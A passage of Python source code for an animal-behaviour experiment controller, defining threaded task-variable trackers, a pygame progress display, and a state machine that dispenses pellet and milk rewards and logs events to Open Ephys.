chewing_times = copy(self.ttlTimes)
n_chewings = np.sum(chewing_times > time_from)
return n_chewings
class Abstract_Variables(object):
"""
If self._variable_state_update_pending is set True, get() and get_all()
methods only return after a new update has taken place.
"""
def __init__(self):
"""
Can be reimplemented but must be called as well with super.
"""
# Create variable states
self._variable_states = []
self._variable_state_names = []
self._variable_states_Lock = Lock()
self._variable_state_update_pending = True
# Compute variable states for first time
self._recompute_dynamic_variables()
# Create a list of relevance time markers
self._last_relevance = [time()] * len(self._variable_state_names)
# Start updating loop in the background
VARIABLE_UPDATE_RATE = 10
self._start_updating(VARIABLE_UPDATE_RATE)
def _update_variable_states(self, variable_states, variable_state_names):
# Update variable states
with self._variable_states_Lock:
self._variable_states = variable_states
self._variable_state_names = variable_state_names
# Mark that no update is pending
self._variable_state_update_pending = False
def _wait_until_pending_update_complete(self):
while self._variable_state_update_pending:
sleep(0.005)
def _recompute_dynamic_variables(self):
"""
Must be re-implemented.
This method must finish by calling self._update_variable_states method.
This method is called iteratively to keep track of dynamic variables.
"""
raise NotImplementedError
self._update_variable_states(variable_states, variable_state_names)
def _update_loop(self, update_rate):
loop_clock = pygame.time.Clock()
while self._loop_active:
self._recompute_dynamic_variables()
loop_duration = loop_clock.tick(update_rate)
if loop_duration > (25 + 1000 / update_rate):
warnings.warn('Method _recompute_dynamic_variables in ' + str(type(self)) + \
' runs slower than assigned ' + \
'update rate ' + str(update_rate) + ' Hz. Duration ' + \
str(loop_duration) + ' ms.', RuntimeWarning)
def _start_updating(self, update_rate):
self._loop_active = True
self._T_loop = Thread(target=self._update_loop,
args=(update_rate,))
self._T_loop.start()
def _stop_updating(self):
self._loop_active = False
self._T_loop.join()
def get(self, name, key, set_relevant=False):
self._wait_until_pending_update_complete()
if name in self._variable_state_names:
if set_relevant:
self._set_relevant(name)
with self._variable_states_Lock:
return copy(self._variable_states[self._variable_state_names.index(name)][key])
else:
return None
def get_all(self):
self._wait_until_pending_update_complete()
with self._variable_states_Lock:
return copy(self._variable_states)
def get_all_relevance(self):
"""
Returns list of time in seconds for each variable in _variable_states list
since this was last set as relevant.
"""
return [time() - rel for rel in self._last_relevance]
def _set_relevant(self, name):
self._last_relevance[self._variable_state_names.index(name)] = time()
def close(self):
self._stop_updating()
class GenericGame_Variables(Abstract_Variables):
def __init__(self, TaskSettings, processed_position_list):
# Parse inputs
self.processed_position_list = processed_position_list
# Parse TaskSettings
self._distance_steps = TaskSettings['distance_steps']
self._last_travel_smoothing = TaskSettings['LastTravelSmooth']
self._last_travel_min_dist = TaskSettings['LastTravelDist']
# Initialize position data for use in computing variable states
self._initialize_position_data_for_update_variable_states()
# Proceed with original __init__ method
super(GenericGame_Variables, self).__init__()
def _initialize_position_data_for_update_variable_states(self):
posHistory = [None]
while None in posHistory:
if len(self.processed_position_list) > self._distance_steps:
posHistory = copy(self.processed_position_list[-self._distance_steps:])
else:
posHistory = [None]
if not (None in posHistory):
self._lastKnownPosHistory = posHistory
else:
sleep(0.01)
def _recompute_dynamic_variables(self):
# Get animal position history
posHistory = self.processed_position_list[-self._distance_steps:]
if not (None in posHistory):
self._lastKnownPosHistory = posHistory[-1]
else:
posHistory = [self._lastKnownPosHistory] * self._distance_steps
# Compute all game progress variables
variable_states = []
variable_state_names = []
# Check if has been moving enough in the last few seconds
variable_state_names.append('mobility')
total_distance = compute_distance_travelled(posHistory, self._last_travel_smoothing)
variable_states.append({'name': 'Mobility',
'target': self._last_travel_min_dist,
'status': int(round(total_distance)),
'complete': total_distance >= self._last_travel_min_dist,
'percentage': total_distance / float(self._last_travel_min_dist)})
# Update variable states
self._update_variable_states(variable_states, variable_state_names)
class PelletGame_Variables(Abstract_Variables):
def __init__(self, TaskSettings, ChewingTracker):
# Parse inputs
self._ChewingTracker = ChewingTracker
# Parse TaskSettings
self._distance_steps = TaskSettings['distance_steps']
self._one_second_steps = TaskSettings['one_second_steps']
self._chewing_target = TaskSettings['Chewing_Target']
self._reward_min_separation_mean = TaskSettings['PelletRewardMinSeparationMean']
self._reward_min_separation_variance = TaskSettings['PelletRewardMinSeparationVariance']
self._max_inactivity_duration = TaskSettings['MaxInactivityDuration']
# Create timers
self._last_reward = time()
self.update_reward_min_separation()
# Proceed with original __init__ method
super(PelletGame_Variables, self).__init__()
def update_reward_min_separation(self):
mean_val = self._reward_min_separation_mean
var_val = self._reward_min_separation_variance
jitter = [int(- mean_val * var_val), int(mean_val * var_val)]
jitter = random.randint(jitter[0], jitter[1])
new_val = int(mean_val + jitter)
self._reward_min_separation = new_val
# Ensure variables are updated using this new value before they are observed
self._variable_state_update_pending = True
def update_last_reward(self):
self._last_reward = time()
# Ensure variables are updated using this new value before they are observed
self._variable_state_update_pending = True
def _recompute_dynamic_variables(self):
# Compute all game progress variables
variable_states = []
variable_state_names = []
# Check if animal has been without pellet reward for too long
timeSinceLastReward = time() - self._last_reward
variable_state_names.append('inactivity')
variable_states.append({'name': 'Inactivity',
'target': self._max_inactivity_duration,
'status': int(round(timeSinceLastReward)),
'complete': timeSinceLastReward >= self._max_inactivity_duration,
'percentage': timeSinceLastReward / float(self._max_inactivity_duration)})
# Check if animal has been chewing enough since last reward
if self._chewing_target > 0:
variable_state_names.append('chewing')
n_chewings = self._ChewingTracker.number_of_chewings(self._last_reward)
variable_states.append({'name': 'Chewing',
'target': self._chewing_target,
'status': n_chewings,
'complete': n_chewings >= self._chewing_target,
'percentage': n_chewings / float(self._chewing_target)})
else:
variable_state_names.append('chewing')
variable_states.append({'name': 'Chewing',
'target': self._chewing_target,
'status': 0,
'complete': True,
'percentage': 0})
# Check if enough time as passed since last pellet reward
timeSinceLastPelletReward = time() - self._last_reward
variable_state_names.append('time_since_last_pellet')
variable_states.append({'name': 'Since Pellet',
'target': self._reward_min_separation,
'status': int(round(timeSinceLastPelletReward)),
'complete': timeSinceLastPelletReward >= self._reward_min_separation,
'percentage': timeSinceLastPelletReward / float(self._reward_min_separation)})
# Update variable states
self._update_variable_states(variable_states, variable_state_names)
class MilkGame_Variables(Abstract_Variables):
def __init__(self, TaskSettings, processed_position_list, MilkRewardDevices, MilkGoal):
# Parse inputs
self.processed_position_list = processed_position_list
self._MilkRewardDevices = MilkRewardDevices
self._MilkGoal = MilkGoal
# Parse TaskSettings
self._distance_steps = TaskSettings['distance_steps']
self._one_second_steps = TaskSettings['one_second_steps']
self._angular_distance_steps = TaskSettings['angular_distance_steps']
self._max_distance_in_arena = TaskSettings['max_distance_in_arena']
self._min_trial_separation_mean = TaskSettings['MilkTrialMinSeparationMean']
self._min_trial_separation_variance = TaskSettings['MilkTrialMinSeparationVariance']
self._min_start_distance = TaskSettings['MilkTaskMinStartDistance']
self._min_angular_distance = TaskSettings['MilkTaskMinGoalAngularDistance']
self._min_goal_distance = TaskSettings['MilkTaskMinGoalDistance']
self._max_trial_duration = TaskSettings['MilkTrialMaxDuration']
# Create timers
self._last_trial = time()
self.update_min_trial_separation()
# Initialize position data for use in computing variable states
self._initialize_position_data_for_update_variable_states()
# Proceed with original __init__ method
super(MilkGame_Variables, self).__init__()
def _initialize_position_data_for_update_variable_states(self):
posHistory = [None]
while None in posHistory:
if len(self.processed_position_list) > self._distance_steps:
posHistory = copy(self.processed_position_list[-self._distance_steps:])
else:
posHistory = [None]
if not (None in posHistory):
self._lastKnownPosHistory = posHistory
else:
sleep(0.01)
def _update_feeder_distances(self, posHistory_one_second_steps):
mean_posHistory = compute_mean_posHistory(posHistory_one_second_steps)
distances = []
for ID in self._MilkRewardDevices.IDs_present:
distances.append(euclidean(mean_posHistory, self._MilkRewardDevices.positions[ID]))
self._feeder_distances = distances
def closest_feeder_ID(self):
return self._MilkRewardDevices.IDs_present[np.argmin(self._feeder_distances)]
def update_min_trial_separation(self):
mean_val = self._min_trial_separation_mean
var_val = self._min_trial_separation_variance
jitter = [int(- mean_val * var_val), int(mean_val * var_val)]
jitter = random.randint(jitter[0], jitter[1])
new_val = int(mean_val + jitter)
self._min_trial_separation = new_val
# Ensure variables are updated using this new value before they are observed
self._variable_state_update_pending = True
def update_last_trial(self):
self._last_trial = time()
# Ensure variables are updated using this new value before they are observed
self._variable_state_update_pending = True
def _recompute_dynamic_variables(self):
# Get animal position history
max_len = max([self._distance_steps, self._one_second_steps, self._angular_distance_steps])
posHistory_max_length = self.processed_position_list[-max_len:]
posHistory = posHistory_max_length[-self._distance_steps:]
posHistory_one_second_steps = posHistory_max_length[-self._one_second_steps:]
posHistory_for_angularDistance = posHistory_max_length[-self._angular_distance_steps:]
# If animal position history is flaulty, use last known position as current static position
if None in posHistory or None in posHistory_one_second_steps or None in posHistory_for_angularDistance:
posHistory_one_second_steps = [self._lastKnownPosHistory] * self._one_second_steps
posHistory_for_angularDistance = [self._lastKnownPosHistory] * self._angular_distance_steps
else:
self._lastKnownPosHistory = posHistory[-1]
# Compute distances to all active milk feeders
self._update_feeder_distances(posHistory_one_second_steps)
# Compute all game progress variables
variable_states = []
variable_state_names = []
# Check if enough time as passed since last milk trial
variable_state_names.append('time_since_last_milk_trial')
timeSinceLastMilkTrial = time() - self._last_trial
variable_states.append({'name': 'Since Trial',
'target': self._min_trial_separation,
'status': int(round(timeSinceLastMilkTrial)),
'complete': timeSinceLastMilkTrial >= self._min_trial_separation,
'percentage': timeSinceLastMilkTrial / float(self._min_trial_separation)})
# Check if animal is far enough from milk rewards
variable_state_names.append('distance_from_milk_feeders')
minDistance = min(self._feeder_distances)
variable_states.append({'name': 'Milk Distance',
'target': self._min_start_distance,
'status': int(round(minDistance)),
'complete': minDistance >= self._min_start_distance,
'percentage': minDistance / float(self._min_start_distance)})
# Check if animal not moving towards goal location
variable_state_names.append('angular_distance_from_goal_feeder')
target_location = self._MilkRewardDevices.positions[self._MilkGoal.copy_ID()]
angularDistance = compute_movement_angular_distance_to_target(posHistory_for_angularDistance,
target_location)
if angularDistance is None:
angularDistance = 0
variable_states.append({'name': 'Milk A.Distance',
'target': self._min_angular_distance,
'status': int(round(angularDistance)),
'complete': angularDistance >= self._min_angular_distance,
'percentage': angularDistance / float(self._min_angular_distance)})
# Check if animal is close enough to goal location
variable_state_names.append('distance_from_goal_feeder')
if self._MilkGoal.copy_ID() in self._MilkRewardDevices.IDs_active:
# This may not be the case if the goal milk feeder has just been deactivated
goal_distance = self._feeder_distances[self._MilkRewardDevices.IDs_present.index(self._MilkGoal.copy_ID())]
else:
goal_distance = self._max_distance_in_arena
variable_states.append({'name': 'Goal Distance',
'target': self._min_goal_distance,
'status': int(round(goal_distance)),
'complete': goal_distance <= self._min_goal_distance,
'percentage': 1 - (goal_distance - self._min_goal_distance) / float(self._max_distance_in_arena)})
# Check if animal is too close to goal incorrect location
if len(self._MilkRewardDevices.IDs_present) > 1:
variable_state_names.append('distance_from_other_feeders')
other_distances = min([self._feeder_distances[i] for i in range(len(self._MilkRewardDevices.IDs_present)) if self._MilkRewardDevices.IDs_present[i] != self._MilkGoal.copy_ID()])
variable_states.append({'name': 'Other Distance',
'target': self._min_goal_distance,
'status': int(round(other_distances)),
'complete': other_distances <= self._min_goal_distance,
'percentage': 1 - (other_distances - self._min_goal_distance) / float(self._max_distance_in_arena)})
# Check if trial has been running for too long
variable_state_names.append('milk_trial_duration')
trial_run_time = time() - self._last_trial
variable_states.append({'name': 'Trial Duration',
'target': self._max_trial_duration,
'status': int(round(trial_run_time)),
'complete': trial_run_time > self._max_trial_duration,
'percentage': trial_run_time / float(self._max_trial_duration)})
# Update variable states
self._update_variable_states(variable_states, variable_state_names)
class PositionList(object):
"""
Keeps updating local position list in a separate thread.
"""
def __init__(self, processed_position_list, TaskSettings, update_interval):
self._processed_position_list = processed_position_list
self.list_len = 1 + max([TaskSettings['distance_steps'],
TaskSettings['one_second_steps'],
TaskSettings['angular_distance_steps']])
while len(self._processed_position_list) <= self.list_len:
sleep(0.1)
self._position_list = self._processed_position_list[-self.list_len:]
self.lock = Lock()
self.updating = True
self.updating_thread = Thread(target=self.updating_worker, args=(update_interval,))
self.updating_thread.start()
def updating_worker(self, update_interval):
last_update = time()
while self.updating:
if time() - last_update < update_interval:
sleep(update_interval * 0.1)
continue
data = copy(self._processed_position_list[-self.list_len:])
with self.lock:
self._position_list = data
last_update = time()
@property
def position_list(self):
with self.lock:
return copy(self._position_list)
def __iter__(self):
return iter(self.position_list)
def __getitem__(self, key):
return self.position_list[key]
def __len__(self):
return len(self.position_list)
def close(self):
self.updating = False
self.updating_thread.join()
class Variables(object):
def __init__(self, TaskSettings, processed_position_list,
ChewingTracker=None, MilkRewardDevices=None, MilkGoal=None,
position_update_interval=0.1):
self._names = []
self._instances = {}
self.local_processed_position_list = PositionList(processed_position_list, TaskSettings,
position_update_interval)
# Instantiate Generic variables
self._instances['GenericGame_Variables'] = GenericGame_Variables(TaskSettings,
self.local_processed_position_list)
self._names.append('GenericGame_Variables')
# Instantiate Pellet Game variables if pellet game active
if TaskSettings['games_active']['pellet']:
self._instances['PelletGame_Variables'] = PelletGame_Variables(TaskSettings, ChewingTracker)
self._names.append('PelletGame_Variables')
# Instantiate Milk Game variables if milk game active
if TaskSettings['games_active']['milk']:
self._instances['MilkGame_Variables'] = MilkGame_Variables(TaskSettings,
self.local_processed_position_list,
MilkRewardDevices, MilkGoal)
self._names.append('MilkGame_Variables')
def get(self, name):
return self._instances[name]
def full_list(self):
full_list = []
for names in self._names:
full_list += self._instances[names].get_all()
return full_list
def full_list_relevance(self):
full_list_relevance = []
for names in self._names:
full_list_relevance += self._instances[names].get_all_relevance()
return full_list_relevance
def set_dict(self):
return self._instances
def close(self):
self.local_processed_position_list.close()
for name in self._names:
self._instances[name].close()
class VariableDisplay(object):
def __init__(self, position_on_screen, renderText, Variables):
"""
position_on_screen - dict - ['top', 'bottom', 'left', 'right'] border of the data on screen
renderText - pygame.font.SysFont.render method for an existing font instace
Variables - Variables instance
"""
self._renderText = renderText
self._Variables = Variables
self._pre_render(position_on_screen)
def _get_all_variable_states(self):
return self._Variables.full_list(), self._Variables.full_list_relevance()
def _pre_render(self, position_on_screen):
"""
Pre-computes variable state display positions and renders static text
position_on_screen - dict - ['top', 'bottom', 'left', 'right'] border of the data on screen
provided to VariableDisplay.render method
"""
variable_states, _ = self._get_all_variable_states()
# Initialise random color generation
random.seed(1232)
rcolor = lambda: random.randint(0,255)
# Compute progress bar locations
textSpacing = 3
textSpace = 10 + textSpacing
textLines = 3
xpos = np.linspace(position_on_screen['left'], position_on_screen['right'], 2 * len(variable_states))
xlen = xpos[1] - xpos[0]
xpos = xpos[::2]
ybottompos = position_on_screen['bottom'] - textSpace * textLines
ymaxlen = position_on_screen['bottom'] - position_on_screen['top'] - textSpace * textLines
progress_bars = []
for i, vs in enumerate(variable_states):
progress_bars.append({'name_text': self._renderText(vs['name']),
'target_text': '',
'value_text': '',
'name_position': (xpos[i], ybottompos + 1 * textSpace),
'target_position': (xpos[i], ybottompos + 2 * textSpace),
'value_position': (xpos[i], ybottompos + 3 * textSpace),
'color': (rcolor(), rcolor(), rcolor()),
'Position': {'xpos': xpos[i],
'xlen': xlen,
'ybottompos': ybottompos,
'ymaxlen': ymaxlen}})
random.seed(None)
self.progress_bars = progress_bars
def render(self, screen, max_relevance_latency=0.2):
"""
screen - pygame.display.set_mode output
max_relevance_latency - float - if more seconds since last relevance, colored dark gray
"""
variable_states, relevance = self._get_all_variable_states()
for vs, pb, rel in zip(variable_states, self.progress_bars, relevance):
screen.blit(pb['name_text'], pb['name_position'])
screen.blit(self._renderText('T: ' + str(vs['target'])), pb['target_position'])
screen.blit(self._renderText('C: ' + str(vs['status'])), pb['value_position'])
if rel < max_relevance_latency:
color = pb['color'] # This could be turned into a condition to have state dependent color
else:
color = (30, 30, 30)
if vs['complete']:
ylen = int(round(pb['Position']['ymaxlen']))
ypos = int(round(pb['Position']['ybottompos'] - pb['Position']['ymaxlen']))
position = (pb['Position']['xpos'], ypos, pb['Position']['xlen'], ylen)
draw_rect_with_border(screen, color, (255, 255, 255), position, border=2)
else:
ylen = int(round(vs['percentage'] * pb['Position']['ymaxlen']))
ypos = pb['Position']['ybottompos'] - ylen
position = (pb['Position']['xpos'], ypos, pb['Position']['xlen'], ylen)
pygame.draw.rect(screen, color, position, 0)
class GameState(object):
def __init__(self, **kwargs):
"""
Can be re-reimplemented, but must accept **kwargs. These can be used
further but must not be changed.
"""
def pre_logic(self, **kwargs):
"""
Is called once before GameState.repeat_logic method calls, using same input kwargs.
Can be re-implemented.
"""
pass
def repeat_logic(self, **kwargs):
"""
Must be re-implemented and must accept **kwargs.
This method should utilize kwargs provided to __init__ and this method.
The method is called repeatedly until it does not return None.
Must return:
next_state - str - name of the next state class
kwargs - dict - at minimum must be an empty dicitonary.
This is passed to the next state class repeat_logic method.
"""
raise NotImplementedError
return next_state, kwargs
def enter(self, game_rate, **kwargs):
"""
This should be called immediately after instantiation.
This method blocks, calls GameState.repeat_logic repeatedly,
until it outputs the next_state and kwargs.
"""
self._continue = True
# Call GameState.pre_logic before successive GameState.repeat_logic method calls.
self.pre_logic(**kwargs)
# Keep calling GameState.repeat_logic until it does not return None
ret = None
loop_clock = pygame.time.Clock()
while self._continue and ret is None:
ret = self.repeat_logic(**kwargs)
loop_duration = loop_clock.tick(game_rate)
if loop_duration > (25 + 1000 / game_rate):
warnings.warn('Method repeat_logic in ' + str(type(self)) + \
' runs slower than assigned ' + \
'rate ' + str(game_rate) + ' Hz. Duration ' + \
str(loop_duration) + ' ms.', RuntimeWarning)
# Expand output and return
if self._continue:
next_state, kwargs = ret
return next_state, kwargs
def exit(self):
"""
Interrupts repeated GameState.repeat_logic calls and
causes GameState.enter method to return None.
"""
self._continue = False
class GameState_Init_Rewards(GameState):
"""
This state dispenses rewards if any are required during initialization.
"""
def __init__(self, **kwargs):
# Parse input arguments
self._GameState_kwargs = kwargs
self.MessageToOE = kwargs['MessageToOE']
self.init_pellets = kwargs['InitPellets']
self.init_milk = kwargs['InitMilk']
if 'PelletRewardDevices' in kwargs.keys() and hasattr(kwargs['PelletRewardDevices'], 'IDs_active'):
self.pellet_IDs_active = kwargs['PelletRewardDevices'].IDs_active
else:
self.pellet_IDs_active = []
if 'MilkRewardDevices' in kwargs.keys() and hasattr(kwargs['MilkRewardDevices'], 'IDs_active'):
self.milk_IDs_active = kwargs['MilkRewardDevices'].IDs_active
else:
self.milk_IDs_active = []
def _release_pellet_reward(self, ID, quantity):
game_state = GameState_PelletReward(**self._GameState_kwargs)
state_specific_kwargs = {'action': 'GameState_Init_Rewards', 'ID': ID, 'quantity': quantity}
game_state.enter(1, action='GameState_Init_Rewards', ID=ID,
quantity=quantity, suppress_MessageToOE=True)
def _release_milk_reward(self, ID, quantity):
game_state = GameState_MilkReward(**self._GameState_kwargs)
state_specific_kwargs = {'action': 'GameState_Init_Rewards', 'ID': ID, 'quantity': quantity}
game_state.enter(1, action='GameState_Init_Rewards', ID=ID,
quantity=quantity, suppress_MessageToOE=True)
def _compute_pellet_rewards(self):
minPellets = int(np.floor(float(self.init_pellets) / len(self.pellet_IDs_active)))
extraPellets = np.mod(self.init_pellets, len(self.pellet_IDs_active))
feeder_pellet_count = minPellets * np.ones(len(self.pellet_IDs_active), dtype=np.int16)
feeder_pellet_count[:extraPellets] = feeder_pellet_count[:extraPellets] + 1
return feeder_pellet_count
def _dispense_pellet_rewards(self, feeder_pellet_count):
T_rewards = []
for ID, n_pellets in zip(self.pellet_IDs_active, feeder_pellet_count):
if n_pellets > 0:
T = Thread(target=self._release_pellet_reward, args=(ID, n_pellets))
T.start()
T_rewards.append(T)
return T_rewards
def _dispense_milk_rewards(self, quantity):
T_rewards = []
for ID in self.milk_IDs_active:
T = Thread(target=self._release_milk_reward, args=(ID, quantity))
T.start()
T_rewards.append(T)
return T_rewards
def pre_logic(self, **kwargs):
self.MessageToOE('GameState_Init_Rewards')
# Collect threads into this list
T_rewards = []
# Dispense pellet rewards
if len(self.pellet_IDs_active) > 0 and self.init_pellets > 0:
feeder_pellet_count = self._compute_pellet_rewards()
T_rewards += self._dispense_pellet_rewards(feeder_pellet_count)
# Dispense milk rewards
if len(self.milk_IDs_active) > 0 and self.init_milk > 0:
T_rewards += self._dispense_milk_rewards(self.init_milk)
# Ensure all threads have finished
for T in T_rewards:
T.join()
def repeat_logic(self, **kwargs):
return 'GameState_Interval', {}
class GameState_Interval_Pellet(GameState):
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.PelletGame_Variables = kwargs['PelletGame_Variables']
self.pellet_feeder_ID = kwargs['PelletChoice'].next()
def pre_logic(self, **kwargs):
self.MessageToOE('GameState_Interval_Pellet')
def repeat_logic(self, **kwargs):
# Acquire relavant variable states
conditions = {'inactivity': self.PelletGame_Variables.get('inactivity', 'complete', set_relevant=True),
'chewing': self.PelletGame_Variables.get('chewing', 'complete', set_relevant=True),
'pellet_interval': self.PelletGame_Variables.get('time_since_last_pellet', 'complete', set_relevant=True)}
if conditions['inactivity']:
# If animal has been without any rewards for too long, release pellet reward
return 'GameState_PelletReward', {'action': 'goal_inactivity', 'ID': self.pellet_feeder_ID}
elif conditions['chewing'] and conditions['pellet_interval']:
# If animal has been chewing and there has been sufficient time since last pellet reward
return 'GameState_Pellet', {}
class GameState_Interval_Milk(GameState):
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.MilkGame_Variables = kwargs['MilkGame_Variables']
def pre_logic(self, **kwargs):
self.MessageToOE('GameState_Interval_Milk')
def repeat_logic(self, **kwargs):
# Acquire relavant variable states
conditions = {'milk_trial_interval': self.MilkGame_Variables.get('time_since_last_milk_trial', 'complete', set_relevant=True)}
if conditions['milk_trial_interval']:
# If sufficient time has passed since last milk trial
return 'GameState_Milk', {}
class GameState_Interval_Pellet_And_Milk(GameState):
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.PelletGame_Variables = kwargs['PelletGame_Variables']
self.MilkGame_Variables = kwargs['MilkGame_Variables']
self.pellet_milk_ratio = kwargs['PelletMilkRatio']
self.pellet_feeder_ID = kwargs['PelletChoice'].next()
def pre_logic(self, **kwargs):
self.MessageToOE('GameState_Interval_Pellet_And_Milk')
def _choose_subtask(self):
if random.uniform(0, 1) < self.pellet_milk_ratio:
subtask = 'GameState_Pellet'
else:
subtask = 'GameState_Milk'
return subtask
def repeat_logic(self, **kwargs):
# Acquire relavant variable states
conditions = {'inactivity': self.PelletGame_Variables.get('inactivity', 'complete', set_relevant=True),
'chewing': self.PelletGame_Variables.get('chewing', 'complete', set_relevant=True),
'pellet_interval': self.PelletGame_Variables.get('time_since_last_pellet', 'complete', set_relevant=True),
'milk_trial_interval': self.MilkGame_Variables.get('time_since_last_milk_trial', 'complete', set_relevant=True)}
if conditions['inactivity']:
# If animal has been without any rewards for too long, release pellet reward
return 'GameState_PelletReward', {'action': 'goal_inactivity', 'ID': self.pellet_feeder_ID}
elif conditions['chewing'] and conditions['pellet_interval'] and conditions['milk_trial_interval']:
# If conditions for pellet and milk state are met, choose one based on _choose_subtask method
return self._choose_subtask(), {}
elif conditions['chewing'] and conditions['pellet_interval'] and (not conditions['milk_trial_interval']):
# If conditions are met for pellet but not for milk, change game state to pellet
return 'GameState_Pellet', {}
elif (not conditions['chewing']) and conditions['pellet_interval'] and conditions['milk_trial_interval']:
# If conditions are met for milk but not for pellet, change game state to milk
return 'GameState_Milk', {}
def GameState_Interval(**kwargs):
games_active = kwargs['games_active']
if games_active['pellet']and not games_active['milk']:
return GameState_Interval_Pellet(**kwargs)
elif games_active['milk'] and not games_active['pellet']:
return GameState_Interval_Milk(**kwargs)
elif games_active['pellet'] and games_active['milk']:
return GameState_Interval_Pellet_And_Milk(**kwargs)
class GameState_Pellet(GameState):
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.GenericGame_Variables = kwargs['GenericGame_Variables']
self.PelletGame_Variables = kwargs['PelletGame_Variables']
self.game_counters = kwargs['game_counters']
self.feeder_ID = kwargs['PelletChoice'].next()
def update_game_counters(self, ID):
idx = self.game_counters['Pellets']['ID'].index(ID)
self.game_counters['Pellets']['count'][idx] += 1
def pre_logic(self, **kwargs):
self.MessageToOE('GameState_Pellet')
def repeat_logic(self, **kwargs):
# Acquire relavant variable states
conditions = {'inactivity': self.PelletGame_Variables.get('inactivity', 'complete', set_relevant=True),
'mobility': self.GenericGame_Variables.get('mobility', 'complete', set_relevant=True)}
if conditions['inactivity']:
# If animal has been without any rewards for too long, release pellet reward
self.update_game_counters(self.feeder_ID)
return 'GameState_PelletReward', {'action': 'GameState_Pellet.inactivity', 'ID': self.feeder_ID}
elif conditions['mobility']:
# If the animal is mobile enough, release pellet reward
self.update_game_counters(self.feeder_ID)
return 'GameState_PelletReward', {'action': 'GameState_Pellet.mobility', 'ID': self.feeder_ID}
class GameState_PelletReward(GameState):
"""
This state just means pellet reward is released.
This is implemented in pre_logic method to avoid
warnings about too slow processing in GameState.repeat_logic method.
"""
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.quantity = kwargs['PelletQuantity']
self.reward_device = kwargs['PelletRewardDevices']
self.PelletGame_Variables = kwargs['PelletGame_Variables']
def pre_logic(self, **kwargs):
if not ('suppress_MessageToOE' in kwargs.keys()) or not kwargs['suppress_MessageToOE']:
self.MessageToOE('GameState_PelletReward ' + kwargs['action'])
# Parse input arguments
ID = kwargs['ID']
if 'quantity' in kwargs.keys():
self.quantity = kwargs['quantity']
# Send command to release reward and wait for positive feedback
feedback = self.reward_device.actuator_method_call(ID, 'release', self.quantity)
if feedback:
# Send message to Open Ephys GUI
OEmessage = 'Reward pellet ' + ID + ' ' + str(self.quantity)
self.MessageToOE(OEmessage)
# Reset last reward timer
self.PelletGame_Variables.update_last_reward()
else:
# If failed, remove feeder from game and change button(s) red
self.reward_device.inactivate_feeder(ID)
# Send message to Open Ephys GUI
OEmessage = 'FEEDER pellet ' + ID + ' inactivated'
self.MessageToOE(OEmessage)
def repeat_logic(self, **kwargs):
return 'GameState_Interval', {}
class GameState_Milk(GameState):
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.GenericGame_Variables = kwargs['GenericGame_Variables']
self.MilkGame_Variables = kwargs['MilkGame_Variables']
def pre_logic(self, **kwargs):
self.MessageToOE('GameState_Milk')
def _check_duration(self):
if not hasattr(self, '_time_of_first_check_duration'):
self._time_of_first_check_duration = time()
return time() - self._time_of_first_check_duration
def repeat_logic(self, **kwargs):
# Acquire relavant variable states
conditions = {'mobility': self.GenericGame_Variables.get('mobility', 'complete', set_relevant=True),
'distance_from_milk_feeders': self.MilkGame_Variables.get('distance_from_milk_feeders', 'complete', set_relevant=True),
'angular_distance_from_goal_feeder': self.MilkGame_Variables.get('angular_distance_from_goal_feeder', 'complete', set_relevant=True)}
if conditions['distance_from_milk_feeders'] and conditions['mobility'] and conditions['angular_distance_from_goal_feeder']:
# If animal is far enough from milk feeders and is mobile enough but not running to the goal, start milk trial
return 'GameState_MilkTrial', {'action': 'GameState_Milk'}
elif self._check_duration() > 60:
# If this game state has been active for more than 60 seconds, move back to interval
return 'GameState_Interval', {}
class GameState_MilkTrial(GameState):
def __init__(self, **kwargs):
# Parse input arguments
self.MessageToOE = kwargs['MessageToOE']
self.MilkGoal = kwargs['MilkGoal']
self.MilkTrialSignals = kwargs['MilkTrialSignals']
self.GenericGame_Variables = kwargs['GenericGame_Variables']
self.MilkGame_Variables = kwargs['MilkGame_Variables']
self.game_counters = kwargs['game_counters']
def update_game_counters_started(self, ID):
idx = self.game_counters['Milk trials']['ID'].index(ID)
self.game_counters['Milk trials']['count'][idx] += 1
def update_game_counters_successful(self, ID):
idx = self.game_counters['Successful']['ID'].index(ID)
self.game_counters['Successful']['count'][idx] += 1
def pre_logic(self, **kwargs):
# Check if this is the first repetition
first_repetition = self.MilkGoal.check_if_first_repetition()
# Send timestamp to Open Ephys GUI
OEmessage = 'GameState_MilkTrial ' + kwargs['action'] + ' ' + self.MilkGoal.copy_ID()
if first_repetition:
OEmessage += ' presentation_trial'
else:
OEmessage += ' repeat_trial'
self.MessageToOE(OEmessage)
# Reset milk trial timers
self.MilkGame_Variables.update_min_trial_separation()
self.MilkGame_Variables.update_last_trial()
# Start milk trial signals
Thread(target=self.MilkTrialSignals.start,
args=(self.MilkGoal.copy_ID(), first_repetition)).start()
# Update game counters
self.update_game_counters_started(self.MilkGoal.copy_ID())
def logic_first_trial(self, **kwargs):
# Acquire relavant variable states
conditions = {'distance_from_goal_feeder': self.MilkGame_Variables.get('distance_from_goal_feeder', 'complete', set_relevant=True),
'milk_trial_duration': self.MilkGame_Variables.get('milk_trial_duration', 'complete', set_relevant=True)}
if conditions['distance_from_goal_feeder']:
# If subject reached goal location, proceed with reward
self.update_game_counters_successful(self.MilkGoal.copy_ID())
self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
ID = self.MilkGoal.copy_ID()
self.MilkGoal.next(game_counters=self.game_counters)
return 'GameState_MilkReward', {'action': 'GameState_MilkTrial', 'ID': ID, 'trial_type': 'presentation'}
elif conditions['milk_trial_duration']:
# If time limit for task duration has passed, stop milk trial without reward.
# Milk Trial goal is not updated if first trial fails.
self.MilkTrialSignals.stop(self.MilkGoal.copy_ID())
return 'GameState_MilkTrial_Fail', {'reason': 'timeout'}
def logic_other_trial(self, **kwargs):
# Acquire relavant variable states
conditions = {'distance_from_goal_feeder': self.MilkGame_Variables.get('distance_from_goal_feeder', 'complete', set_relevant=True),
'distance_from_other_feeders': self.MilkGame_Variables.get('distance_from_other_feeders', 'complete', set_relevant=True),
'milk_trial_duration': self.MilkGame_Variables.get('milk_trial_duration', 'complete', set_relevant=True)}
